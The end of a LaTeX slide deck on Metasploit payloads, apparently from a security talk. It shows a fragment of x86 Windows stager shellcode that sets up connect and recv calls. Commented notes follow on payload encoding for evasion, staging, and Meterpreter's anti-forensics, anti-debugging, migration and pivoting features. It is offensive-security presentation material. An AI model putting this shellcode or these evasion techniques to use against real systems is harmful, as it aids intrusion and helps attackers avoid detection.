B70C mov bh,0xc ; ebx = 0x0c00
|
|
53 push ebx ; push length (0xc00)
|
|
51 push ecx ; push buffer
|
|
57 push edi ; push fd
|
|
51 push ecx ; push buffer
|
|
6A10 push byte +0x10 ; push addrlen (16)
|
|
51 push ecx ; push &sockaddr_in
|
|
57 push edi ; push fd
|
|
56 push esi ; push recv
|
|
FFE5 jmp ebp ; call connect
|
|
\end{verbatim}
|
|
}
|
|
\end{frame}
|
|
|
|
\end{document}
|
|
|
|
|
|
\begin{comment}
|
|
|
|
|
|
NOTEZ
|
|
|
|
First
|
|
|
|
What aren't we talking about
|
|
- New exploit vectors
|
|
- New exploit techniques
|
|
- Bugs in any shape, size, or form
|
|
|
|
What is encoding, and why do we do it?
|
|
- Bad character avoidence, don't need special case payloads for that..
|
|
- Added bonus of evasion
|
|
- Nice because you usually just need to write 1 good encoder...
|
|
|
|
What is staging, and why?
|
|
- Size problem
|
|
- Multiple your aresenal, 5 stagers + 5 stages, 10 shellcodes, but 25 payloads
|
|
|
|
Should move around the ordinal information, explain what ordinals are first.
|
|
Talk about how ordinals are diffined to be static in their .lib
|
|
List some of the limitations for ws2_32 (like no WSASocket, and what that means
|
|
in terms of writing shellcode, pipe shell, etc).
|
|
|
|
|
|
Post exploitation.
|
|
|
|
What's most important to them
|
|
1) Features
|
|
2) Evasion
|
|
3) Technology.
|
|
|
|
The order we should present is reverse, save the best for last
|
|
|
|
1) introduce and explain the technology
|
|
- dll injection
|
|
- TLV protocol, async, threadsafe, meterp sharing, etc
|
|
- Ruby APIs (how they emulate the native APIs, native API replacement, etc)
|
|
|
|
2) explain how this has the added benefit against anti-forensics
|
|
- no disk access
|
|
- anti-debugging
|
|
- page locking / swapping prevention
|
|
- encryption
|
|
- connection reuse and tunneling / channels
|
|
- no filesystem .exe loading...
|
|
|
|
3) explain the type of features an end-pentester would see
|
|
- pivoting / portfwd
|
|
- file upload / download, list, run, etc
|
|
- channels, multiple command shells, hung terminal doesn't totally fuck you
|
|
- vnc / idle time stffu (ties into stealthyness)
|
|
|
|
Possible flashy demos:
|
|
- migrating
|
|
- Possibly change window colors, move windows, etc in the process we migrate
|
|
to. Was shok's idea, so you could "visualize" the migrate, etc.
|
|
- Do some flashy no-disk .exe injection, send up an opengl demo!
|
|
|
|
Interesting asides:
|
|
- Great for testing (Metatest, bringing you a better Metasploit Framework!)
|
|
- make a insanely great remote control application (automation)
|
|
|
|
|
|
Future stuff:
|
|
- Botnetesk type stuff / mesh
|
|
- Listening meterp / multiple control channels / better collaboration..
|
|
|
|
|
|
|
|
OLD ----
|
|
|
|
|
|
Notes on post-exploitation
|
|
|
|
- Core Impact / Syscall Proxying
|
|
|
|
+ Mainly written to support their feature set, not to expose it to an end
|
|
user. Don't think you're going to get much access to the syscall libraries,
|
|
they are all written in C and dlls for the most part it seems.
|
|
|
|
+ you get their nice features, pivoting, file access, minishell, etc, but
|
|
for anything beyond that, you have to upgrade your agent, and then I don't
|
|
believe those are using syscall proxying type things anymore. I think some
|
|
of them bundle python interpreters...
|
|
|
|
+ how it works
|
|
+ really cool, and simple
|
|
+ no need to write vicitim-side code for any calls you want to make
|
|
+ inefficent for some types of things (port scanning)
|
|
|
|
- CANVAS
|
|
|
|
- mosdef
|
|
- model is very similar to dN
|
|
- you have to write a client and server component
|
|
- build environment not seperated, have you write your client side component
|
|
in wanna-be-aitel c, and have you have it in a python script.
|
|
- he has an API to do some stuff, but mostly low level stuff, and nothing
|
|
high level and cool.
|
|
- like all of his stuff, it's very rough and primitive seeming. I'm sure,
|
|
just like spike, you can do some cool stuff with it, but it's like building
|
|
a car with a rock, or something...
|
|
|
|
+ Code is dirty....
|
|
+
|
|
|
|
\end{comment}
|